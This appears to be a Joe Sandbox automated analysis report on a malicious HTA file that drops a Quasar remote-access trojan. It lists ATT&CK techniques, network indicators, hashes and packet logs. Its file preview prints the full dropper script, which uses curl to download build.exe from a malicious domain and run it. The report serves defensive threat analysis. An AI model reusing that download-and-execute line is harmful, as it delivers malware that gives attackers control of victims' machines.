              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              DLL Side-Loading
              1
              Disable or Modify Tools
              LSASS Memory111
              Security Software Discovery
              Remote Desktop Protocol11
              Input Capture
              1
              Non-Standard Port
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
              Virtualization/Sandbox Evasion
              Security Account Manager31
              Virtualization/Sandbox Evasion
              SMB/Windows Admin Shares1
              Archive Collected Data
              1
              Remote Access Software
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
              Process Injection
              NTDS1
              Application Window Discovery
              Distributed Component Object ModelInput Capture1
              Ingress Tool Transfer
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Hidden Files and Directories
              LSA Secrets1
              System Network Configuration Discovery
              SSHKeylogging2
              Non-Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
              Obfuscated Files or Information
              Cached Domain Credentials1
              File and Directory Discovery
              VNCGUI Input Capture113
              Application Layer Protocol
              Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Software Packing
              DCSync24
              System Information Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              build.hta0%ReversingLabs
              SourceDetectionScannerLabelLink
              C:\Users\user\Desktop\build.exe16%ReversingLabs
              C:\Users\user\Desktop\build.exe20%VirustotalBrowse
              No Antivirus matches
              SourceDetectionScannerLabelLink
              ip-api.com0%VirustotalBrowse
              roblox.airdns.org3%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://www.foobar2000.org/licensehttps://www.foobar2000.org/http://forums.foobar2000.org/AboutOpens0%Avira URL Cloudsafe
              http://www.foobar2000.org/FAQ.htmlCould0%Avira URL Cloudsafe
              http://freegeoip.net/xml/0%Avira URL Cloudsafe
              https://www.foobar2000.org/downloadportablestandardquietcrashednoguisafeinstallfoobar2000.exe:0%Avira URL Cloudsafe
              http://help.foobar2000.org/filesystem::g_get_canonical_pathfilesystem::g_list_directoryunpack://file0%Avira URL Cloudsafe
              http://schemas.datacontract.org/2004/07/0%Avira URL Cloudsafe
              http://www.foobar2000.org/FAQ.html0%Avira URL Cloudsafe
              http://freegeoip.net/xml/0%VirustotalBrowse
              https://www.foobar2000.org/licensehttps://www.foobar2000.org/http://forums.foobar2000.org/AboutOpens0%VirustotalBrowse
              http://www.foobar2000.org/FAQ.htmlCould0%VirustotalBrowse
              http://forums.foobar2000.org/0%Avira URL Cloudsafe
              http://schemas.datacontract.org/2004/07/0%VirustotalBrowse
              http://forums.foobar2000.org/0%VirustotalBrowse
              http://www.foobar2000.org/FAQ.html0%VirustotalBrowse
              https://www.foobar2000.org/license0%VirustotalBrowse
              http://help.foobar2000.org/filesystem::g_get_canonical_pathfilesystem::g_list_directoryunpack://file0%VirustotalBrowse
              https://www.foobar2000.org/downloadportablestandardquietcrashednoguisafeinstallfoobar2000.exe:0%VirustotalBrowse
              https://www.foobar2000.org/license0%Avira URL Cloudsafe
              https://mediafire.zip/build.exep0%Avira URL Cloudsafe
              https://mediafire.zip/build.exe-obuild.exei0%Avira URL Cloudsafe
              https://mediafire.zip/build.exem0%Avira URL Cloudsafe
              https://mediafire.zip/build.exe0%Avira URL Cloudsafe
              http://wiki.hydrogenaudio.org/index.php?title=Replaygain0%Avira URL Cloudsafe
              OuB3'!fy.0%Avira URL Cloudsafe
              http://ip-api.com0%Avira URL Cloudsafe
              http://ip-api.com/json/0%Avira URL Cloudsafe
              http://api.ipify.org/0%Avira URL Cloudsafe
              https://mediafire.zip/build.exe0%VirustotalBrowse
              http://wiki.hydrogenaudio.org/index.php?title=Replaygain0%VirustotalBrowse
              http://ip-api.com/json/0%VirustotalBrowse
              https://www.foobar2000.org/download0%Avira URL Cloudsafe
              https://www.foobar2000.org/downloadcomponent_manager::on_app_initPre0%Avira URL Cloudsafe
              http://api.ipify.org/1%VirustotalBrowse
              https://www.foobar2000.org/0%Avira URL Cloudsafe
              http://schemas.microsof0%Avira URL Cloudsafe
              http://wiki.hydrogenaudio.org/index.php?title=ReplaygainSet0%Avira URL Cloudsafe
              https://www.foobar2000.org/0%VirustotalBrowse
              http://help.foobar2000.org/0%Avira URL Cloudsafe
              https://www.foobar2000.org/downloadcomponent_manager::on_app_initPre0%VirustotalBrowse
              http://help.foobar2000.org/0%VirustotalBrowse
              https://www.foobar2000.org/download0%VirustotalBrowse
              http://ip-api.com0%VirustotalBrowse
              http://wiki.hydrogenaudio.org/index.php?title=ReplaygainSet0%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              ip-api.com
              208.95.112.1
              truetrueunknown
              mediafire.zip
              172.67.195.64
              truetrue
                unknown
                roblox.airdns.org
                64.42.179.59
                truefalseunknown
                NameMaliciousAntivirus DetectionReputation
                https://mediafire.zip/build.exetrue
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                OuB3'!fy.true
                • Avira URL Cloud: safe
                unknown
                http://ip-api.com/json/true
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://help.foobar2000.org/filesystem::g_get_canonical_pathfilesystem::g_list_directoryunpack://filebuild.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://freegeoip.net/xml/build.exe, build.exe, 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://www.foobar2000.org/licensehttps://www.foobar2000.org/http://forums.foobar2000.org/AboutOpensbuild.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://www.foobar2000.org/FAQ.htmlCouldbuild.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://www.foobar2000.org/downloadportablestandardquietcrashednoguisafeinstallfoobar2000.exe:build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://schemas.datacontract.org/2004/07/csc.exe, 00000009.00000002.2971577534.0000000006AAC000.00000004.00000800.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://www.foobar2000.org/FAQ.htmlbuild.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://forums.foobar2000.org/build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://www.foobar2000.org/licensebuild.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://mediafire.zip/build.exepcurl.exe, 00000004.00000003.1756384519.0000000002744000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1756502997.0000000002745000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.1756850133.0000000002745000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://mediafire.zip/build.exe-obuild.exeicurl.exe, 00000004.00000002.1756723247.0000000002710000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://mediafire.zip/build.exemcurl.exe, 00000004.00000003.1756384519.0000000002744000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1756502997.0000000002745000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.1756850133.0000000002745000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://wiki.hydrogenaudio.org/index.php?title=Replaygainbuild.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://ip-api.comcsc.exe, 00000009.00000002.2971577534.0000000006AAC000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000009.00000002.2971577534.0000000006A99000.00000004.00000800.00020000.00000000.sdmpfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://api.ipify.org/build.exe, build.exe, 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmpfalse
                • 1%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namecsc.exe, 00000009.00000002.2971577534.0000000006A99000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://www.foobar2000.org/downloadbuild.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://www.foobar2000.org/downloadcomponent_manager::on_app_initPrebuild.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                https://www.foobar2000.org/build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://schemas.microsofbuild.exefalse
                • Avira URL Cloud: safe
                unknown
                http://wiki.hydrogenaudio.org/index.php?title=ReplaygainSetbuild.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://help.foobar2000.org/build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.drfalse
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                208.95.112.1
                ip-api.comUnited States
                53334TUT-ASUStrue
                64.42.179.59
                roblox.airdns.orgUnited States
                63018DEDICATEDUSfalse
                172.67.195.64
                mediafire.zipUnited States
                13335CLOUDFLARENETUStrue
                IP
                127.0.0.1
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1454170
                Start date and time:2024-06-09 01:25:08 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 6m 33s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:11
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:build.hta
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winHTA@10/3@3/4
                EGA Information:
                • Successful, ratio: 66.7%
                HCA Information:
                • Successful, ratio: 80%
                • Number of executed functions: 48
                • Number of non-executed functions: 12
                Cookbook Comments:
                • Found application associated with file extension: .hta
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target mshta.exe, PID 7456 because there are no executed function
                • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                TimeTypeDescription
                19:26:38API Interceptor1417904x Sleep call for process: csc.exe modified
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                208.95.112.1build.exeGet hashmaliciousQuasarBrowse
                • ip-api.com/json/
                ZLsIkKPtLQ.exeGet hashmaliciousUnknownBrowse
                • ip-api.com/line/?fields=hosting
                ZLsIkKPtLQ.exeGet hashmaliciousUnknownBrowse
                • ip-api.com/line/?fields=hosting
                fix.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                • ip-api.com/json/?fields=225545
                PO.docx.docGet hashmaliciousAgentTeslaBrowse
                • ip-api.com/line/?fields=hosting
                ac#U03c2.exeGet hashmaliciousAgentTeslaBrowse
                • ip-api.com/line/?fields=hosting
                PYT W2471234-MLIG.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                • ip-api.com/line/?fields=hosting
                staff record or employee record.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                • ip-api.com/line/?fields=hosting
                4ef10e7296fb6c5df039a4b95147b1cb4482bdbee0a097863fe345b295302cc9_dump.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                • ip-api.com/line/?fields=hosting
                rlytKovocev.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                • ip-api.com/line/?fields=hosting
                64.42.179.59build.exeGet hashmaliciousQuasarBrowse
                  172.67.195.64http://ihealthcovidtest.comGet hashmaliciousUnknownBrowse
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    roblox.airdns.orgbuild.exeGet hashmaliciousQuasarBrowse
                    • 64.42.179.59
                    ip-api.combuild.exeGet hashmaliciousQuasarBrowse
                    • 208.95.112.1
                    ZLsIkKPtLQ.exeGet hashmaliciousUnknownBrowse
                    • 208.95.112.1
                    ZLsIkKPtLQ.exeGet hashmaliciousUnknownBrowse
                    • 208.95.112.1
                    fix.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                    • 208.95.112.1
                    PO.docx.docGet hashmaliciousAgentTeslaBrowse
                    • 208.95.112.1
                    PYT W2471234-MLIG.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                    • 208.95.112.1
                    staff record or employee record.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                    • 208.95.112.1
                    4ef10e7296fb6c5df039a4b95147b1cb4482bdbee0a097863fe345b295302cc9_dump.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                    • 208.95.112.1
                    rlytKovocev.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                    • 208.95.112.1
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    DEDICATEDUSbuild.exeGet hashmaliciousQuasarBrowse
                    • 64.42.179.59
                    Replace.exeGet hashmaliciousUnknownBrowse
                    • 74.201.73.52
                    x1b5bmJgLm.elfGet hashmaliciousUnknownBrowse
                    • 200.220.163.225
                    0FnrrE8B6Y.elfGet hashmaliciousMiraiBrowse
                    • 168.81.61.232
                    D2M15lCoQK.elfGet hashmaliciousMiraiBrowse
                    • 45.74.57.45
                    CGlwOBF2cH.elfGet hashmaliciousUnknownBrowse
                    • 45.74.57.32
                    SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dllGet hashmaliciousCobaltStrikeBrowse
                    • 64.42.181.227
                    VlkShT2TjD.elfGet hashmaliciousGafgytBrowse
                    • 172.83.131.72
                    Enrollment PO, from United Way of the Midlands.emlGet hashmaliciousUnknownBrowse
                    • 216.105.168.10
                    9Dcya2QOaQ.elfGet hashmaliciousMiraiBrowse
                    • 14.1.28.237
                    TUT-ASUSbuild.exeGet hashmaliciousQuasarBrowse
                    • 208.95.112.1
                    ZLsIkKPtLQ.exeGet hashmaliciousUnknownBrowse
                    • 208.95.112.1
                    ZLsIkKPtLQ.exeGet hashmaliciousUnknownBrowse
                    • 208.95.112.1
                    fix.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                    • 208.95.112.1
                    PO.docx.docGet hashmaliciousAgentTeslaBrowse
                    • 208.95.112.1
                    ac#U03c2.exeGet hashmaliciousAgentTeslaBrowse
                    • 208.95.112.1
                    PYT W2471234-MLIG.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                    • 208.95.112.1
                    staff record or employee record.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                    • 208.95.112.1
                    4ef10e7296fb6c5df039a4b95147b1cb4482bdbee0a097863fe345b295302cc9_dump.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                    • 208.95.112.1
                    rlytKovocev.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                    • 208.95.112.1
                    CLOUDFLARENETUShttps://pub-d8d7ac311b234607a98f38098cb878d2.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                    • 104.18.3.35
                    http://proteger-aqui356.hstn.me/Get hashmaliciousUnknownBrowse
                    • 104.20.95.138
                    https://profound-beignet-562245.netlify.app/appeal.html/Get hashmaliciousUnknownBrowse
                    • 104.16.117.116
                    https://afdf.daftardanafisik.my.id/Get hashmaliciousUnknownBrowse
                    • 104.21.63.254
                    https://group4.my-ste.icu/Get hashmaliciousUnknownBrowse
                    • 188.114.96.3
                    https://page-timeteshn.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                    • 172.66.47.80
                    https://support-team-t440706-44xeo12.netlify.app/formGet hashmaliciousUnknownBrowse
                    • 104.16.117.116
                    http://pub-97c8902c9c3b4ec0b4a2b0568cedcfd6.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                    • 104.17.25.14
                    https://scintillating-cosmic-id4964-01e85b6.netlify.app/formGet hashmaliciousUnknownBrowse
                    • 104.16.117.116
                    https://pub-c2aa174758aa43ea80a0607fa6195767.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                    • 104.18.3.35
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    74954a0c86284d0d6e1c4efefe92b521ZK9XFb424l.exeGet hashmaliciousPython Stealer, Creal Stealer, XWormBrowse
                    • 172.67.195.64
                    Chasebank_Statement_May lnk.lnkGet hashmaliciousUnknownBrowse
                    • 172.67.195.64
                    N-WITHERSPOON-46151.jsGet hashmaliciousUnknownBrowse
                    • 172.67.195.64
                    N-WITHERSPOON-86707.jsGet hashmaliciousUnknownBrowse
                    • 172.67.195.64
                    N-WITHERSPOON-46151.jsGet hashmaliciousUnknownBrowse
                    • 172.67.195.64
                    N-WITHERSPOON-86707.jsGet hashmaliciousUnknownBrowse
                    • 172.67.195.64
                    wells_fargo_statement lnk.lnkGet hashmaliciousUnknownBrowse
                    • 172.67.195.64
                    TS-240531-UF1-Creal.exeGet hashmaliciousPython Stealer, Creal StealerBrowse
                    • 172.67.195.64
                    Chasebank_Statement_May.lnkGet hashmaliciousUnknownBrowse
                    • 172.67.195.64
                    ccsetup624.exeGet hashmaliciousUnknownBrowse
                    • 172.67.195.64
                    No context
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                    File Type:data
                    Category:modified
                    Size (bytes):224
                    Entropy (8bit):7.154213125076343
                    Encrypted:false
                    SSDEEP:6:owxlcZoyb8a9tCMUtNDScNR9bheHyxQKNN:oElcqwiCLHyfD
                    MD5:F9603F0321B023CB89A0DC3FE18C5EC2
                    SHA1:A36305FD3FD12539D59CF62CD4C5DDA3175BCD49
                    SHA-256:45E25B67711C438FB0B3523A74F492F681144E38BDACC47C7B9E9015BCB4A4B4
                    SHA-512:05E7490E8A1E70B4FE10153B9BF08610E051B5AEABCD0E27048A7B2A4BC41E6AA8BF90611BEF7D5064B0460B6FA8F2C8AC6CA3F7D0AEC2B48C7A540CCEFEE1D3
                    Malicious:false
                    Reputation:low
                    Preview:_&1.78^ ....k..q,.K..y.&e...y<.#..s.0..I..x...O.) :.sy.c.ROy...`6....T.@!z..4.._....)Di..}.e..Wx....$).!.f@..=..G..a.......s.d...-.I..Y..H.a.!...W.C....#T>.....A.._..~G8......\.L=...{..*p..+bZr..*.mW.[.w...S.\.1.
                    Process:C:\Windows\SysWOW64\curl.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:modified
                    Size (bytes):3124224
                    Entropy (8bit):6.828488553975669
                    Encrypted:false
                    SSDEEP:49152:rBT0kcpBrQvDFw/Wb/Zy8kIvLSXkbPvEZNLlUHDZQ:rdcf8i/2/Zy8kIO10Q
                    MD5:05EECFC1820AB3273409323601A71F23
                    SHA1:5076D5C3A1AA6F2FFCC299F803D0DD01B33D6DD7
                    SHA-256:4A72F3948F014C2DED502832814C6D65FEB78BD1CAEF7DF8BCECB78F7A90B6E2
                    SHA-512:81D10658AAF6D6341B929DCDB1ECCD97DD752B7CBE7B497ED85B88A03EA540A2DE6B24AE98ACE353E861D1EA7AD181449E332DEC26B075C4684C7286CC167A00
                    Malicious:true
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 16%
                    • Antivirus: Virustotal, Detection: 20%, Browse
                    Reputation:low
                    Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$........j.l...?...?...?.s.?...?.d.?...?.~.>...?.~.>...?.~.>...?.W.?...?.~.>...?S+.?...?.~.>...?.c.>...?.c.>...?.c.>...?.c.>...?...?...?.~.>...?.~.?...?..{?...?.~.>...?Rich...?................PE..L...gb.`.........."......*...~......./.......@....@..........................@0......6%...@................................... .......#.L.....................%.\....a..p....................b.......U..@............@........ .`....................text....0.......*.................. ..`.rdata... ...@......................@..@.data........` ......J .............@..._RDATA...0...p!..,.... .............@..@.rsrc...L.....#.......#.............@..@................................................................................................................................................................................................................................................
                    Process:C:\Windows\SysWOW64\curl.exe
                    File Type:ASCII text, with CR, LF line terminators
                    Category:dropped
                    Size (bytes):399
                    Entropy (8bit):3.4602320657646954
                    Encrypted:false
                    SSDEEP:6:I2swj2SAykymUeg/8Uni1qSgOgcOVhF5153ziqd/qkwI7Uo:Vz6ykymUexb1U9cOTFPsI/17Uo
                    MD5:19877D7AD4EFBF92907042431F8F3EA3
                    SHA1:CAF7C791716729AE0EDF325E5D838710E175D55F
                    SHA-256:E56707C19893CFB0D3E3E6B1A48D22FA62C60107259096EFCD63AC26BDE5287F
                    SHA-512:E38B259CE66E3EDCF941677FDF7D63A8B353B844C815B96856A01E1DF44AC6CA660F4F74C05347926C7EA371834A1F3733CF66C1AF676E93D90B1D3A726F5665
                    Malicious:false
                    Reputation:low
                    Preview: % Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 3051k 0 2036 0 0 2333 0 0:22:19 --:--:-- 0:22:19 2334.100 3051k 100 3051k 0 0 1737k 0 0:00:01 0:00:01 --:--:-- 1739k..
                    File type:HTML document, ASCII text
                    Entropy (8bit):4.825399307820561
                    TrID:
                    • HTML Application (8008/1) 100.00%
                    File name:build.hta
                    File size:173 bytes
                    MD5:81d631fdb7e6f1d8b2222355bdea0d92
                    SHA1:fc5a81c0b9df522b041caf2557f152514ccfcd5c
                    SHA256:d5647dd8dbd73ac01bad18aefafab4b7848861c12eaff129b37f65cfc940575d
                    SHA512:1baab86587eeef814752265b1d340e41f0063b19621e184cdc2a8fb7b7471587b35f00cace53e24ebd1d2bbb287836cd24eb6fa04863332e486a5dce3d1023ec
                    SSDEEP:3:gH//sG2iMILN/zqp9Np4HWfSqMefFJBhBX/ozSZeYLn:FqrN/up9XrfS3ebNvoVYL
                    TLSH:84C012764C9F807EB26B42D59632A38CD1938C62F080D42172088D802E134A1667E9A5
                    File Content Preview:<script>. l = new ActiveXObject("WScript.Shell");. l.run("cmd.exe /c curl -L https://mediafire.zip/build.exe -o build.exe & build.exe");. window.close();.</script>.
                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    06/09/24-01:26:38.405968TCP2036383ET TROJAN Common RAT Connectivity Check Observed4974680192.168.2.4208.95.112.1
                    TimestampSource PortDest PortSource IPDest IP
                    Jun 9, 2024 01:26:06.790723085 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:06.790775061 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:06.790864944 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:06.842948914 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:06.843004942 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:07.450149059 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:07.450238943 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:07.456070900 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:07.456098080 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:07.456408024 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:07.459964991 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:07.500497103 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:07.595808983 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:07.595931053 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:07.595999956 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:07.596018076 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:07.596046925 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:07.596210957 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:07.596295118 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:07.596297026 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:07.596321106 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:07.596398115 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:07.596565008 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:07.596631050 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:07.596662998 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:07.637551069 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:07.637590885 CEST44349733172.67.195.64192.168.2.4
                    Jun 9, 2024 01:26:07.684439898 CEST49733443192.168.2.4172.67.195.64
                    Jun 9, 2024 01:26:07.711483002 CEST44349733172.67.195.64192.168.2.4
